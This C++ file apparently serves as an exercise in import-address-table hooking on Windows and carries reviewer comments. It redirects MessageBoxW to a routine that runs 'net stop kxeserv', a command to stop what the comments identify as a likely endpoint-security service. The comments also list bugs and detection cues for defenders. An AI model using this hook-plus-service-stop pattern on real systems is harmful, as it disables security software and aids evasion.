自己动手熟悉一下^_^
// Forward declaration of the replacement routine. It takes the same four
// arguments, in the same order, as MessageBoxW.
// NOTE(review): no calling convention is spelled out here and the strings are
// LPCTSTR, so this only matches MessageBoxW's prototype in a UNICODE build and
// with a compatible default calling convention. Confirm the build settings.
int Test(HWND hwnd, LPCTSTR str1, LPCTSTR str2, UINT nType);
// Address of Test. _tmain passes &pfnNew to WriteProcessMemory as the source
// buffer, so the bytes copied are this address.
// NOTE(review): the declared type is PROC* although the value is a function
// address rather than a pointer to a slot. sizeof(pfnNew) is still one pointer.
PROC* pfnNew = (PROC*)Test;
// Set by _tmain to the import-table slot it is currently examining.
PROC* ppfn = NULL;
// Replacement routine that _tmain writes into this module's import slot for
// MessageBoxW. It ignores all four arguments, calls MessageBoxW with fixed
// text, runs one shell command, and always returns 0.
int Test(HWND hwnd, LPCTSTR str1, LPCTSTR str2, UINT nType)
{
// NOTE(review): this call is compiled against the same import slot that _tmain
// overwrites, so once the patch is in place it presumably re-enters Test
// instead of reaching user32. Confirm before relying on the behaviour below.
MessageBoxW(NULL, L"Test", L"Test", MB_OK);
// Runs "net stop kxeserv" through the command interpreter, i.e. asks the
// Service Control Manager to stop the service named kxeserv. The return value
// is discarded, so a refusal (for example for lack of privilege) goes unnoticed.
// NOTE(review): kxeserv looks like the service name of an endpoint-security
// product (verify). Monitoring should treat a process that spawns
// "net stop" against a security service as a tampering indicator.
_wsystem(L"net stop kxeserv");
return 0;
}
// Demo entry point. It locates the slot for MessageBoxW in this executable's
// own import address table (IAT), overwrites the slot with the address held in
// pfnNew (Test), and then calls MessageBoxW twice so the redirection can be
// observed. argc and argv are unused, and every path returns 0.
// The memory patch is applied to the current process only (GetCurrentProcess()).
// Defender's view: after the patch the slot holds an address inside this EXE
// rather than inside user32.dll, which is the mismatch that import-table
// integrity checks compare against the exporting module's address range.
int _tmain(int argc, _TCHAR* argv[])
{
// A NULL name returns the handle of the file used to create this process.
// The handle is used below as the image base for RVA arithmetic.
HMODULE hMd = GetModuleHandleA(NULL);
// HMODULE hMd2 = GetModuleHandle(L"User32.dll");
if (!hMd)
{
return 0;
}
// Address of the real MessageBoxW as exported by the loaded User32.dll. This is
// the value searched for in the IAT.
// NOTE(review): neither GetModuleHandle nor GetProcAddress is checked for
// NULL, and the wide literal passed to the TCHAR macro GetModuleHandle only
// compiles in a UNICODE build.
PROC pfnOrig = GetProcAddress(
GetModuleHandle(L"User32.dll"),
"MessageBoxW"
);
ULONG ulSize;
// Ask for the import directory of the mapped image (MappedAsImage = TRUE).
// The result points at the first import descriptor. ulSize receives the
// directory size and is not used afterwards.
PIMAGE_IMPORT_DESCRIPTOR pImportDesc = (PIMAGE_IMPORT_DESCRIPTOR)
ImageDirectoryEntryToData(
hMd,
TRUE,
IMAGE_DIRECTORY_ENTRY_IMPORT,
&ulSize
);
if (pImportDesc == NULL)
{
return 0;
}
// Walk the descriptor array, which ends at an entry whose Name RVA is 0, and
// stop at the descriptor for user32.
for (; pImportDesc->Name; pImportDesc++)
{
// Name is an RVA, so add the image base to get the DLL name string.
PSTR pszName = (PSTR) ((PBYTE)hMd + pImportDesc->Name);
// NOTE(review): lstrcmpA is case-sensitive, so the descriptor is only found
// when the import name is spelled exactly "USER32.dll".
if (lstrcmpA(pszName, "USER32.dll") == 0)
{
break;
}
}
// Reached the terminating descriptor: this image does not import from a
// module named "USER32.dll". Name is a DWORD RVA compared against NULL here.
if (pImportDesc->Name == NULL)
{
return 0;
}
// FirstThunk is the RVA of the array of resolved function addresses for this
// descriptor. The array ends at a zero entry.
PIMAGE_THUNK_DATA pThunk = (PIMAGE_THUNK_DATA)
((PBYTE)hMd + pImportDesc->FirstThunk);
for (; pThunk->u1.Function; pThunk++)
{
ppfn = (PROC*) &pThunk->u1.Function;
// The slot to patch is the one that currently holds MessageBoxW's address.
BOOL bFound = (*ppfn == pfnOrig);
if (bFound)
{
// First attempt: copy the pointer-sized value stored in pfnNew over the slot.
if (WriteProcessMemory(
GetCurrentProcess(),
ppfn,
&pfnNew,
sizeof(pfnNew),
NULL
))
{
break;
}
else
{
// Fallback when the direct write fails: change the page protection, write
// again, then restore the previous protection.
// NOTE(review): none of the three return values is checked and there is no
// break, so the loop keeps scanning whether or not the write succeeded.
DWORD dwoldProtect;
VirtualProtect(ppfn, sizeof(pfnNew), PAGE_WRITECOPY, &dwoldProtect);
WriteProcessMemory(GetCurrentProcess(), ppfn, &pfnNew, sizeof(pfnNew), NULL);
VirtualProtect(ppfn, sizeof(pfnNew), dwoldProtect, &dwoldProtect);
}
}
}
// These calls go through the import slot examined above. If the slot was
// overwritten they reach Test instead of user32's MessageBoxW. Nothing here
// verifies that the patch actually took effect.
MessageBoxW(NULL, L"1", L"1", MB_OK);
MessageBoxW(NULL, L"1", L"1", MB_OK);
// HMODULE aa = ::LoadLibraryW(L"D://DemoDll1.dll");
return 0;
}